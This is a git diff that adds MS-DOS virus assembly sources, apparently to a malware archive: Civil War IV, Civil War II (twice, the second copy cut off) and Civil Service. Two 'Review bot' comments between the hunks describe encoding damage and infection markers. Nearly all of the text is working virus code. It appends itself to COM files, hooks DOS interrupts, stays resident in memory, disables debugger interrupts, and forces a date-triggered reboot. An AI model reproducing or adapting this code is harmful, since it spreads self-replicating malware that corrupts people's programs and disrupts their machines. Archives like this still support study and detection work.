+initials dw 4844h
+lenght dw ?
+jump db 0e9h,0
+message db "For all i've seen has changed my mind"
+ db "But still the wars go on as the years go by"
+ db "With no love of God or human rights"
+ db "'Cause all these dreams are swept aside"
+ db "By bloody hands of the hypnotized"
+ db "Who carry the cross of homicide"
+ db "And history bears the scars of our Civil Wars."
+writer db "[ DH / TridenT ]",00
+
+ end dummy
diff --git a/MSDOS/Virus.MSDOS.Unknown.civil_4d.asm b/MSDOS/Virus.MSDOS.Unknown.civil_4d.asm
new file mode 100644
index 00000000..4318c996
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.civil_4d.asm
@@ -0,0 +1,201 @@
+;****************************************************************************
+;* Civil War IV v1.3 *
+;* *
+;* Assembled with Tasm 2.5 *
+;* *
+;* (c) Jan '93 by Dark Helmet, The Netherlands. *
+;* The author takes no responsibilty for any damages caused by the virus *
+;* *
+;* This is a example virus with the TPE engine for teaching you how to *
+;* use the TPE engine. *
+;* *
+;*--------------------------------------------------------------------------*
+;* *
+;* Notes: *
+;* *
+;* This virus is NOT dedicated to Sara Gordon, but to all the innocent *
+;* people who are killed in Yugoslavia. *
+;* *
+;* The text in the virus is taken from the song Civil War (hence the name) *
+;* by Guns and Roses, Use Your Illusion II, we hope they don't mind it. *
+;* *
+;* The first name for the virus was NAVIGATOR II, because the virus is *
+;* based on the NAVIGATOR virus (also written by me, a while back), but *
+;* since I decided to put the songtext in it I renamed it to Civil War IV *
+;* *
+;* You need the TPE 1.3 engine to link this program. * *
+;* *
+;****************************************************************************
+
+ .model tiny
+ .radix 16
+ .code
+
+ extrn rnd_init:near
+ extrn rnd_get:near
+ extrn crypt:near
+ extrn tpe_top:near
+
+ org 100h
+
+len equ offset tpe_top - begin
+
+Dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h
+
+Begin: call virus ; calculate delta offset
+
+Virus: pop bp
+ sub bp,offset virus
+
+ mov dx,0fe00h ; DTA instellen
+ mov ah,1ah
+ int 21h
+
+Restore_begin: call rnd_init ; init random generator
+ mov di,0100h
+ lea si,ds:[buffer+bp]
+ mov cx,06h
+ rep movsb
+
+First: lea dx,[com_mask+bp] ;get first COM file
+ mov ah,04eh
+ xor cx,cx
+ int 21h
+
+Open_file: call rnd_get
+ mov ax,03d02h ;open for READ/WRITE
+ mov dx,0fe1eh
+ int 21h
+ mov [handle+bp],ax
+ xchg ax,bx
+
+Read_date: mov ax,05700h ;store date/time for later
+ int 21h ;use
+ mov [date+bp],dx
+ mov [time+bp],cx
+
+Check_infect: mov bx,[handle+bp] ;check if initials present in
+ mov ah,03fh ;file
+ mov cx,06h
+ lea dx,[buffer+bp]
+ int 21h
+
+ mov al,byte ptr [buffer+bp]+3 ;Compare initials
+ mov ah,byte ptr [buffer+bp]+4
+ cmp ax,[initials+bp]
+ jne infect_file ;if initials not present
+ ;start infecting file
+
+Close_file: mov bx,[handle+bp] ;close file
+ mov ah,3eh
+ int 21h
+
+Next_file: mov ah,4fh ;get next COM file
+ int 21h ;in directorie
+ jnb open_file
+ jmp exit
+
+Infect_file: mov ax,word ptr [cs:0fe1ah] ;get lenght of file
+ sub ax,03h
+ mov [lenght+bp],ax
+ mov ax,04200h ;goto begin of file
+ call move_pointer
+
+Write_jump: mov ah,40h ;Write JUMP intruction
+ mov cx,01h
+ lea dx,[jump+bp]
+ int 21h
+
+ mov ah,40h ;Write JUMP offset
+ mov cx,02h
+ lea dx,[lenght+bp]
+ int 21h
+
+ mov ah,40 ;Write initials to check
+ mov cx,02h ;for infection later
+ lea dx,[initials+bp]
+ int 21h
+
+ mov ax,4202h ; move to end of file
+ call move_pointer ; for infection
+
+;*****************************************************************************
+; T P E *
+;*****************************************************************************
+
+Encrypt: push bp ; BP = delta offset
+ ; push delta offset on stack
+ ; for later use.
+
+ mov ax,cs ; Calculate worksegment
+ add ax,01000h
+ mov es,ax ; ES point to decrypt virus
+
+ lea dx,[begin+bp] ; DS:DX begin encryption
+
+ mov cx,len ; virus lenght
+
+ mov bp,[lenght+bp] ; decryption starts at this
+ add bp,103h ; point
+
+ xor si,si ; distance between decryptor
+ ; and encrypted code is 0 bytes
+
+ call rnd_get ; AX = random value
+ call crypt ; encrypt virus
+
+ pop bp ; BP = delta offset
+ ; get delta offset of stack
+
+;******************************************************************************
+; T P E - E N D *
+;******************************************************************************
+
+Write_virus: mov bx,[handle+bp]
+ mov ah,40h
+ int 21h
+
+Restore_date: mov ax,05701h
+ mov bx,[handle+bp]
+ mov cx,[time+bp]
+ mov dx,[date+bp]
+ int 21h
+
+ mov bx,[handle+bp] ; close file
+ mov ah,3eh
+ int 21h
+
+Exit: mov ax,cs ; restore registers
+ mov ds,ax
+ mov es,ax
+ mov bx,0100h ; jump to start program
+ jmp bx
+
+;----------------------------------------------------------------------------
+
+move_pointer: mov bx,[handle+bp]
+ xor cx,cx
+ xor dx,dx
+ int 21h
+ ret
+
+;----------------------------------------------------------------------------
+v_name db "Civil War IV v1.3, (c) Jan '93 "
+com_mask db "*.com",0
+handle dw ?
+date dw ?
+time dw ?
+buffer db 090h,0cdh,020h,044h,048h,00h
+initials dw 4844h
+lenght dw ?
+jump db 0e9h,0
+message db "For all i've seen has changed my mind"
+ db "But still the wars go on as the years go by"
+ db "With no love of God or human rights"
+ db "'Cause all these dreams are swept aside"
+ db "By bloody hands of the hypnotized"
+ db "Who carry the cross of homicide"
+ db "And history bears the scars of our Civil Wars."
+writer db "[ DH / TridenT ]",00
+
+ end dummy
diff --git a/MSDOS/Virus.MSDOS.Unknown.civil_ii.asm b/MSDOS/Virus.MSDOS.Unknown.civil_ii.asm
new file mode 100644
index 00000000..51657b42
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.civil_ii.asm
@@ -0,0 +1,308 @@ +;**************************************************************************** +; Civil War II V1.1 * +; * +; Assembled with Tasm 2.5 * +; (c) 1992 Trident/Dark Helmet, The Netherlands * +; * +;**************************************************************************** +; * +; Civil War... * +; * +; "For all I've seen has change my mind * +; But still the wars go on as the years go by * +; With no love for God or human rights * +; 'Cause all these dreams are swept aside * +; By bloody hands of the hypnotized * +; Who carry the cross of homicide * +; And history bears the scars of our civil war" * +; * +;**************************************************************************** + + .Radix 16 +Civil_War Segment + Model small + Assume cs:Civil_War, ds:Civil_War, es:Civil_War + + org 100h + +len equ offset last - begin +virus_len equ len / 16d + +dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection + ; marker + +begin: Call virus ; make call to + ; push IP on stack + +virus: pop bp ; get IP from stack. + sub bp,109h ; adjust IP. + +restore_host: mov di,0100h ; recover beginning + lea si,ds:[carrier_begin+bp] ; of carrier program. + mov cx,06h + rep movsb + +check_resident: mov ah,0a0h ; check if virus + int 21h ; already installed. 
+ cmp ax,0001h + je end_virus + +adjust_memory: mov ax,cs ; start of Memory + dec ax ; Control Block + mov ds,ax + cmp byte ptr ds:[0000],5a ; check if last + ; block + jne abort ; if not last block + ; end + mov ax,ds:[0003] ; decrease memory + sub ax,40 ; by 1kbyte lenght + mov ds:[0003],ax + sub word ptr ds:[0012],40h + +install_virus: mov bx,ax ; es point to start + mov ax,es ; virus in memory + add ax,bx + mov es,ax + mov cx,len ; cx = lenght virus + mov ax,ds ; restore ds + inc ax + mov ds,ax + lea si,ds:[begin+bp] ; point to start virus + lea di,es:0100 ; point to destination + rep movsb ; copy virus in + ; memory + mov [virus_segment+bp],es ; store start virus + ; in memory + mov ax,cs ; restore es + mov es,ax + +hook_vector: cli ; no interups + mov ax,3521h ; revector int 21 + int 21h + mov ds,[virus_segment+bp] + mov old_21h-6h,bx + mov old_21h+2-6h,es + + mov dx,offset main_virus - 6h + mov ax,2521h + int 21h + sti + +abort: mov ax,cs + mov ds,ax + mov es,ax + +end_virus: mov bx,0100h ; jump to begin + jmp bx ; host file + + +;***************************************************************************** + +main_virus: pushf + cmp ah,0a0h ; check virus call + jne new_21h ; no virus call + mov ax,0001h ; ax = id + popf ; return id + iret + +new_21h: push ds ; save registers + push es + push di + push si + push ax + push bx + push cx + push dx + +check_open: cmp ah,3dh + je chk_com + +check_exec: cmp ax,04b00h ; exec function? + je chk_com + +continu: pop dx ; restore registers + pop cx + pop bx + pop ax + pop si + pop di + pop es + pop ds + popf + jmp dword ptr cs:[old_21h-6] + +chk_com: mov cs:[name_seg-6],ds + mov cs:[name_off-6],dx + cld ; check extension + mov di,dx ; for COM + push ds + pop es + mov al,'.' 
; search extension + repne scasb ; check for 'COM" + cmp word ptr es:[di],'OC' ; check 'CO' + jne continu + cmp word ptr es:[di+2],'M' ; check 'M' + jne continu + + call set_int24h + call set_atribuut + +open_file: mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + mov ax,3D02h ; open file + call do_int21h + jc close_file + push cs + pop ds + mov [handle-6],ax + mov bx,ax + + call get_date + +check_infect: push cs + pop ds + mov bx,[handle-6] ; read first 6 bytes + mov ah,3fh + mov cx,06h + lea dx,[carrier_begin-6] + call do_int21h + mov al, byte ptr [carrier_begin-6]+3 ; check initials + mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H' + cmp ax,[initials-6] + je save_date ; if equal already + ; infect + +get_lenght: mov ax,4200h ; file pointer begin + call move_pointer + mov ax,4202h ; file pointer end + call move_pointer + sub ax,03h ; ax = filelenght + mov [lenght_file-6],ax + + call write_jmp + call write_virus + +save_date: push cs + pop ds + mov bx,[handle-6] + mov dx,[date-6] + mov cx,[time-6] + mov ax,5701h + call do_int21h + +close_file: mov bx,[handle-6] + mov ah,03eh ; close file + call do_int21h + + mov dx,cs:[old_24h-6] ; restore int24h + mov ds,cs:[old_24h+2-6] + mov ax,2524h + call do_int21h + + jmp continu + + + + +new_24h: mov al,3 + iret + +;--------------------------------------------------------------------------- +; PROCEDURES +;--------------------------------------------------------------------------- + +move_pointer: push cs + pop ds + mov bx,[handle-6] + xor cx,cx + xor dx,dx + call do_int21h + ret + +do_int21h: pushf + call dword ptr cs:[old_21h-6] + ret + +write_jmp: push cs + pop ds + mov ax,4200h + call move_pointer + mov ah,40h + mov cx,01h + lea dx,[jump-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[lenght_file-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[initials-6] + call do_int21h + ret + +write_virus: push cs + pop ds + mov ax,4202h + call move_pointer + mov ah,40 + mov cx,len + mov dx,100 + call do_int21h + 
ret + +get_date: mov ax,5700h + call do_int21h + push cs + pop ds + mov [date-6],dx + mov [time-6],cx + ret + +set_int24h: mov ax,3524h + call do_int21h + mov cs:[old_24h-6],bx + mov cs:[old_24h+2-6],es + mov dx,offset new_24h-6 + push cs + pop ds + mov ax,2524h + call do_int21h + ret + +set_atribuut: mov ax,4300h ; get atribuut + mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + call do_int21h + and cl,0feh ; set atribuut + mov ax,4301h + call do_int21h + ret + +;--------------------------------------------------------------------------- +; DATA +;--------------------------------------------------------------------------- + +old_21h dw 00h,00h +old_24h dw 00h,00h +carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h +text db 'Civil War II v1.1, (c) 06/03/1992 Trident/Dark Helmet, The Netherlands',00h +jump db 0e9h +name_seg dw ? +name_off dw ? +virus_segment dw ? +lenght_file dw ? +handle dw ? +date dw ? +time dw ? +initials dw 4844h +last db 090h + +Civil_war ends + end dummy + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪; +;哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪哪; +;哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪; +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪; + diff --git a/MSDOS/Virus.MSDOS.Unknown.civilser.asm b/MSDOS/Virus.MSDOS.Unknown.civilser.asm new file mode 100644 index 00000000..407d7032 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civilser.asm 
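Review bot: The trailer after `end dummy` is mis-encoded: the runs of `哪` are almost certainly CP437 box-drawing bytes that were decoded as a double-byte code page on upload, so the archive now stores corrupted text instead of the original banner. Since the rest of the file is plain ASCII, the file should be re-imported as bytes or transcoded from CP437 to UTF-8, or at least the original code page noted in the header, so the artifact is preserved faithfully for analysts. Separately, `virus_len equ len / 16d` is never referenced in this hunk and is the only line that depends on the `d` radix override; a comment such as `; unused: len itself is what rep movsb and write_virus consume` would stop a reader assuming it feeds the `sub ax,40` memory adjustment.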
@@ -0,0 +1,569 @@ +; Civil Service Virus by Marvin Giskard +; Turbo Assember version 2 + +Exec equ 4B00h +OpenFile equ 3D02h +ReadFile equ 3Fh +WriteFile equ 40h +CloseFile equ 3Eh +EXESign equ 5A4Dh +SeekTop equ 4200h +SeekEnd equ 4202h +GetAttr equ 4300h +SetAttr equ 4301h +GetDT equ 5700h +SetDT equ 5701h +MinSize equ 4h +MaxSize equ 0FBF0h +GetDate equ 2Bh +FileID equ 2206h +MemID equ 4246h ; 'FB' + +.MODEL SMALL +.CODE +ORG 0100h + +Start: + XOR AX, AX + MOV DS, AX + CMP WORD PTR DS:01ACh, MemID + JNE Instl2 + CMP WORD PTR DS:01AEh, FileID + JE NoInstl2 + +Instl2: + CALL InstallInMem + +NoInstl2: + PUSH CS + PUSH CS + POP DS + POP ES + MOV DX, OFFSET FileName + MOV AX, 4B22h + INT 21h + INT 20h + +FileName: DB 'TEST.COM',0 + +AddCode: + JMP OverData + + ; Addcode's data + +Buf: DB 0, 0 ; Miscellaneous Buf +JumpCode: DB 0E9h, 00h, 00h ; Code to be placed at front of file +FSize: DW 0 ; File size +Attr: DB 0 ; Attr of file being infected +FDateTime: DD 0 ; Time and date of file being infected +Generation: DW 0 ; Generation counter +Infected: DW 0 ; Number of files infected +Old24Handler: DD 0 ; Old INT 24h handler +Acts: DB 0 ; Flag to stop reentry +Path: DD 0 + +OverData: + MOV WORD PTR DS:0100h, 0000h + MOV BYTE PTR DS:0102h, 00h + + ; Check if handler already installed by examining 2 words in vector + ; table entry of INT 6Bh + + XOR AX, AX + MOV DS, AX + CMP WORD PTR DS:01ACh, MemID + JNE Instl + CMP WORD PTR DS:01AEh, FileID + JE AlreadyInstalled + +Instl: + CALL InstallInMem + JMP ALreadyInstalled + +InstallInMem: + MOV WORD PTR DS:01ACh, MemID + MOV WORD PTR DS:01AEh, FileID + + PUSH CS + POP DS + + ; Get INT 21h handler in ES:BX. + + MOV AX, 3521h + INT 21h +DoOldOfs: + MOV SI, OFFSET DoOld+1 + MOV [SI], BX + MOV [SI+2], ES + PUSH ES + PUSH BX + POP DX + POP DS + MOV AX, 256Dh + INT 21h + + ; This label is here so that the infect part will be able to calculate + ; source offset of Int21Handler and then place it in here before writing + ; it to disk. 
The OFFSET AddCode will be replaced by the right number. + +Source: + MOV SI, OFFSET AddCode + + ; Destination e.g. Where program will be placed are now calculated by + ; taking the amount of memory in $0040:$0013. Multiply by 16 to get + ; segment of memory end and then subract amount of blocks needed. + ; This is where routine will be placed. + + MOV AX, 0040h + MOV DS, AX + MOV AX, WORD PTR DS:0013h + MOV CL, 6 + SHL AX, CL + + ; Set dest. segment 2048 pages (32 K) below top of memory. + + SUB AX, 2048 + MOV ES, AX + XOR DI, DI + MOV CX, OFFSET AddCodeEnd - OFFSET AddCode + PUSH CS + POP DS + REP MOVSB + + ; Set INT 21h Handler to point to our routine + + MOV AX, 2521h + PUSH ES + POP DS + MOV DX, OFFSET Int21Handler - OFFSET AddCode + INT 21h + + MOV BYTE PTR DS:[OFFSET Acts-OFFSET AddCode], 0 + + RET + +AlreadyInstalled: + + Call DisTrace + + ; Code to jump back to 0100h + + PUSH CS + PUSH CS + POP DS + POP ES + MOV AX, 0100h + JMP AX + + ; Disable tracing and breakpoint setting for debuggers. 
+ +DisTrace: + MOV AX, 0F000h + MOV DS, AX + MOV DX, 0FFF0h + MOV AX, 2501h + INT 21h + MOV AX, 2503h + INT 21h + RET + +Int21Handler: + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH DI + PUSH SI + PUSH ES + PUSH DS + + ; Install devious act if seed is right + + MOV AH, 2Ah + INT 6Dh + CMP CX, 1991 + JB Act + CMP DL, 22 + JNE Timer + DB 0EAh, 0F0h, 0FFh, 00h, 0F0h + +Timer: + MOV AH, 25h + CMP DL, 29 + JE Inst1 + CMP DL, 1 + JE Inst2 + CMP DL, 10 + JE Inst3 + CMP DL, 16 + JE Inst4 + JMP Act +Inst1: + MOV AL, 13h + JMP SetVec +Inst2: + MOV AL, 16h + JMP SetVec +Inst3: + MOV AL, 0Dh + JMP SetVec +Inst4: + MOV AL, 10h + +SetVec: + PUSH CS + POP DS + MOV DX, OFFSET Int24Handler - OFFSET AddCode + INT 6Dh + +Act: + MOV AX, 0040h + MOV DS, AX + MOV AX, WORD PTR DS:006Eh + + PUSH CS + POP DS + MOV BH, DS:[OFFSET Acts - OFFSET AddCode] + CMP BH, 3 + JE NoAct + + CMP AX, 22 + JE NoAct + + MOV BYTE PTR [SI], 3 + MOV AX, 3509h + INT 21h + PUSH ES + PUSH BX + POP DX + POP DS + MOV AX, 256Ah + INT 21h + PUSH CS + POP DS + MOV DX, OFFSET Int9Handler - OFFSET AddCode + MOV AX, 2509h + INT 21h + + MOV AX, 3517h + INT 21h + PUSH ES + PUSH BX + POP DX + POP DS + MOV AX, 256Ch + INT 21h + PUSH CS + POP DS + MOV DX, OFFSET Int17Handler - OFFSET AddCode + MOV AX, 2517h + INT 21h + +NoAct: + + POP DS + POP ES + POP SI + POP DI + POP DX + POP CX + POP BX + POP AX + + CMP AH, 4Bh + JE Infect +DoOld: + ; This next bytes represent a JMP 0000h:0000h. The 0's will be replaced + ; by the address of the old 21 handler. 
+ DB 0EAh + DD 0 + +DoOldPop: + POP ES + POP DS + POP BP + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + JMP DoOld + +CloseQuit: + + MOV AX, 2524h + MOV SI, OFFSET Old24Handler-OFFSET AddCode + MOV DX, CS:[SI] + MOV DS, CS:[SI+2] + INT 21h + + PUSH CS + POP DS + MOV SI, OFFSET FDateTime-OFFSET AddCode + MOV CX, DS:[SI] + MOV DX, DS:[SI+2] + MOV AX, SetDT + INT 21h + + MOV AH, CloseFile + INT 21h + + MOV AX, SetAttr + MOV CL, DS:[OFFSET Attr - OFFSET AddCode] + XOR CH, CH + MOV SI, OFFSET Path-OFFSET AddCode + MOV DX, DS:[SI] + MOV DS, DS:[SI+2] + + INT 21h + + JMP DoOldPop + +Infect: + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH BP + PUSH DS + PUSH ES + + ; Get file's attr + + MOV AX, GetAttr + INT 21h + JC CloseQuit + MOV CS:[OFFSET Attr-OFFSET AddCode], CL + + MOV SI, OFFSET Path-OFFSET AddCode + MOV CS:[SI], DX + MOV CS:[SI+2], DS + + ; Get/Set INT 24h handler + + MOV AX, 3524h + INT 21h + MOV SI, OFFSET Old24Handler-OFFSET AddCode + MOV CS:[SI], BX + MOV CS:[SI+2], ES + MOV AX, 2524h + PUSH CS + POP DS + MOV DX, OFFSET Int24Handler-OFFSET AddCode + INT 21h + + ; Set new attribute + + MOV SI, OFFSET Path-OFFSET AddCode + MOV DX, CS:[SI] + MOV DS, CS:[SI+2] + + MOV AX, SetAttr + MOV CX, 0020h + INT 21h + JC CloseQuitFoot + + MOV AX, OpenFile + INT 21h + JC CloseQuitFoot + MOV BX, AX + + ; Get file's time and date and store + + MOV AX, GetDT + INT 21h + JC CloseQuitFoot + PUSH CS + POP DS + MOV SI, OFFSET FDateTime-OFFSET AddCode + MOV DS:[SI], CX + MOV DS:[SI+2], DX + + ; Read first two bytes of file + + MOV AH, ReadFile + MOV CX, 2 + MOV DX, OFFSET OverData+4-OFFSET AddCode + INT 21h + JC CloseQuitFoot + + ; Check if fisrt two bytes identify the file as an EXE file + ; If so, then don't infect the file + + CMP DS:[OFFSET OverData+4-OFFSET AddCode], EXESign + JE CloseQuitFoot + + ; Read next byte + + MOV AH, ReadFile + MOV CX, 1 + MOV DX, OFFSET OverData+10-OFFSET AddCode + INT 21h + JC CloseQuitFoot + + ; Get file size + + MOV AX, 
SeekEnd + XOR CX, CX + XOR DX, DX + INT 21h + JC CloseQuitFoot + + ; Save filesize and calculate jump offset + + CMP DX, 0 + JG CloseQuitFoot + CMP AX, MinSize + JB CloseQuitFoot + CMP AX, MaxSize + JA CloseQuitFoot + MOV DS:[OFFSET FSize-OFFSET AddCode], AX + MOV CX, AX + SUB AX, 03h + MOV DS:[OFFSET JumpCode+1-OFFSET AddCode], AX + + ; Calculate and store source + + ADD CX, 0100h + MOV [OFFSET Source+1-OFFSET AddCode], CX + + ADD CX, OFFSET DoOld-OFFSET AddCode + MOV [OFFSET DoOldOfs-OFFSET AddCode+1], CX + + JMP OverFoot1 + +CloseQuitFoot: + JMP CloseQuit + +OverFoot1: + ; Read last 2 bytes to see if it is already infected + + MOV AX, SeekTop + XOR CX, CX + MOV DX, [OFFSET FSize-OFFSET AddCode] + SUB DX, 2 + INT 21h + + MOV AH, ReadFile + MOV CX, 2 + MOV DX, OFFSET Buf-OFFSET AddCode + INT 21h + + CMP [OFFSET Buf-OFFSET AddCode], FileID + JE CloseQuitFoot + + ; Prepare to write new jump + + MOV AX, SeekTop + XOR CX, CX + XOR DX, DX + INT 21h + + ; Write new jump + + MOV AH, WriteFile + MOV CX, 3 + MOV DX, OFFSET JumpCode-OFFSET AddCode + INT 21h + + ; Write addcode + ; Code to restore first three bytes is at start of addcode + ; Int21 handler is also included + ; Generation counter is included in data + ; ID is at the end of addcode + + MOV AX, SeekEnd + XOR CX, CX + XOR DX, DX + INT 21h + + ; Increase generation counter before writing it to the new file + + INC WORD PTR [OFFSET Generation - OFFSET AddCode] + + ; Set files infected to 0, for child hasn't infected anyone. 
+ + MOV SI, OFFSET Infected - OFFSET AddCode + PUSH WORD PTR [SI] + MOV WORD PTR [SI], 0 + + MOV AH, WriteFile + MOV DX, OFFSET AddCode - OFFSET AddCode ; 0000 + MOV CX, OFFSET AddCodeEnd - OFFSET AddCode + INT 21h + + ; Decrease counter again, cause all his children should have the same + ; generation count + + DEC WORD PTR [OFFSET Generation - OFFSET AddCode] + + ; Pop number of files infected and incread + + POP AX + INC AX + MOV WORD PTR [OFFSET Infected - OFFSET AddCode], AX + + JMP CloseQuit + +Int24Handler: + XOR AL, AL + IRET + +Int9Handler: + PUSH AX + PUSH CX + PUSH DS + + MOV AX, 0040h + MOV DS, AX + MOV AH, BYTE PTR DS:006Ch + CMP AH, 18 + JA NoChange + MOV CL, 4 + SHL AH, CL + SHR AH, CL + MOV BYTE PTR DS:0017h, AH + +NoChange: + POP DS + POP CX + POP AX + INT 6Ah + IRET + +Int17Handler: + CMP AH, 00h + JNE DoOld17 + PUSH DS + PUSH AX + PUSH BX + MOV BX, 0040h + MOV DS, BX + MOV BH, BYTE PTR DS:006Ch + SHR BH, 1 + SHR BH, 1 + CMP BH, 22h + JE Ignore17 + POP BX + POP AX + POP DS + +DoOld17: + INT 6Ch + IRET + +Ignore17: + POP BX + POP AX + POP DS + IRET + + DW FileID + +AddCodeEnd: + +END Start + diff --git a/MSDOS/Virus.MSDOS.Unknown.civilwar.asm b/MSDOS/Virus.MSDOS.Unknown.civilwar.asm new file mode 100644 index 00000000..800cfc2b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civilwar.asm 
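Review bot: The two-line header leaves undocumented the marks and triggers an analyst of this archive needs first, and the hunk contains all of them; a header comment block should record them. Residency is signalled by `MemID` (4246h) and `FileID` (2206h) written over the INT 6Bh vector at 0000:01ACh/01AEh, the original INT 21h handler is parked on vector 6Dh (`MOV AX, 256Dh`), and an infected COM starts with the 3-byte `JumpCode` and ends with `DW FileID`, which is what the read-last-two-bytes check at `OverFoot1` keys on. The date branch at the top of `Int21Handler` (`MOV AH, 2Ah` / `INT 6Dh`) executes the `DB 0EAh, 0F0h, 0FFh, 00h, 0F0h` far jump to F000:FFF0 — a warm reboot — when the returned day is 22 in any year from 1991, on days 29, 1, 10 and 16 it points vectors 13h, 16h, 0Dh and 10h at `Int24Handler` (`XOR AL, AL` / `IRET`), and `DisTrace` does the same to INT 1 and INT 3 on every run. A comment of the form `; Marks: 6Bh vector = 'FB'/2206h, file tail = DW 2206h; old INT 21h on 6Dh; far jump to F000:FFF0 on day 22 (year >= 1991)` at the top would let triage proceed without re-reading the handler.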
@@ -0,0 +1,303 @@ +;**************************************************************************** +; Civil War II V1.1 * +; * +; Assembled with Tasm 2.5 * +; (c) 1992 Trident/Dark Helmet, The Netherlands * +; * +;**************************************************************************** +; * +; Civil War... * +; * +; "For all I've seen has change my mind * +; But still the wars go on as the years go by * +; With no love for God or human rights * +; 'Cause all these dreams are swept aside * +; By bloody hands of the hypnotized * +; Who carry the cross of homicide * +; And history bears the scars of our civil war" * +; * +;**************************************************************************** + + .Radix 16 +Civil_War Segment + Model small + Assume cs:Civil_War, ds:Civil_War, es:Civil_War + + org 100h + +len equ offset last - begin +virus_len equ len / 16d + +dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection + ; marker + +begin: Call virus ; make call to + ; push IP on stack + +virus: pop bp ; get IP from stack. + sub bp,109h ; adjust IP. + +restore_host: mov di,0100h ; recover beginning + lea si,ds:[carrier_begin+bp] ; of carrier program. + mov cx,06h + rep movsb + +check_resident: mov ah,0a0h ; check if virus + int 21h ; already installed. 
+ cmp ax,0001h + je end_virus + +adjust_memory: mov ax,cs ; start of Memory + dec ax ; Control Block + mov ds,ax + cmp byte ptr ds:[0000],5a ; check if last + ; block + jne abort ; if not last block + ; end + mov ax,ds:[0003] ; decrease memory + sub ax,40 ; by 1kbyte lenght + mov ds:[0003],ax + sub word ptr ds:[0012],40h + +install_virus: mov bx,ax ; es point to start + mov ax,es ; virus in memory + add ax,bx + mov es,ax + mov cx,len ; cx = lenght virus + mov ax,ds ; restore ds + inc ax + mov ds,ax + lea si,ds:[begin+bp] ; point to start virus + lea di,es:0100 ; point to destination + rep movsb ; copy virus in + ; memory + mov [virus_segment+bp],es ; store start virus + ; in memory + mov ax,cs ; restore es + mov es,ax + +hook_vector: cli ; no interups + mov ax,3521h ; revector int 21 + int 21h + mov ds,[virus_segment+bp] + mov old_21h-6h,bx + mov old_21h+2-6h,es + + mov dx,offset main_virus - 6h + mov ax,2521h + int 21h + sti + +abort: mov ax,cs + mov ds,ax + mov es,ax + +end_virus: mov bx,0100h ; jump to begin + jmp bx ; host file + + +;***************************************************************************** + +main_virus: pushf + cmp ah,0a0h ; check virus call + jne new_21h ; no virus call + mov ax,0001h ; ax = id + popf ; return id + iret + +new_21h: push ds ; save registers + push es + push di + push si + push ax + push bx + push cx + push dx + +check_open: cmp ah,3dh + je chk_com + +check_exec: cmp ax,04b00h ; exec function? + je chk_com + +continu: pop dx ; restore registers + pop cx + pop bx + pop ax + pop si + pop di + pop es + pop ds + popf + jmp dword ptr cs:[old_21h-6] + +chk_com: mov cs:[name_seg-6],ds + mov cs:[name_off-6],dx + cld ; check extension + mov di,dx ; for COM + push ds + pop es + mov al,'.' 
; search extension + repne scasb ; check for 'COM" + cmp word ptr es:[di],'OC' ; check 'CO' + jne continu + cmp word ptr es:[di+2],'M' ; check 'M' + jne continu + + call set_int24h + call set_atribuut + +open_file: mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + mov ax,3D02h ; open file + call do_int21h + jc close_file + push cs + pop ds + mov [handle-6],ax + mov bx,ax + + call get_date + +check_infect: push cs + pop ds + mov bx,[handle-6] ; read first 6 bytes + mov ah,3fh + mov cx,06h + lea dx,[carrier_begin-6] + call do_int21h + mov al, byte ptr [carrier_begin-6]+3 ; check initials + mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H' + cmp ax,[initials-6] + je save_date ; if equal already + ; infect + +get_lenght: mov ax,4200h ; file pointer begin + call move_pointer + mov ax,4202h ; file pointer end + call move_pointer + sub ax,03h ; ax = filelenght + mov [lenght_file-6],ax + + call write_jmp + call write_virus + +save_date: push cs + pop ds + mov bx,[handle-6] + mov dx,[date-6] + mov cx,[time-6] + mov ax,5701h + call do_int21h + +close_file: mov bx,[handle-6] + mov ah,03eh ; close file + call do_int21h + + mov dx,cs:[old_24h-6] ; restore int24h + mov ds,cs:[old_24h+2-6] + mov ax,2524h + call do_int21h + + jmp continu + + + + +new_24h: mov al,3 + iret + +;--------------------------------------------------------------------------- +; PROCEDURES +;--------------------------------------------------------------------------- + +move_pointer: push cs + pop ds + mov bx,[handle-6] + xor cx,cx + xor dx,dx + call do_int21h + ret + +do_int21h: pushf + call dword ptr cs:[old_21h-6] + ret + +write_jmp: push cs + pop ds + mov ax,4200h + call move_pointer + mov ah,40h + mov cx,01h + lea dx,[jump-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[lenght_file-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[initials-6] + call do_int21h + ret + +write_virus: push cs + pop ds + mov ax,4202h + call move_pointer + mov ah,40 + mov cx,len + mov dx,100 + call do_int21h + 
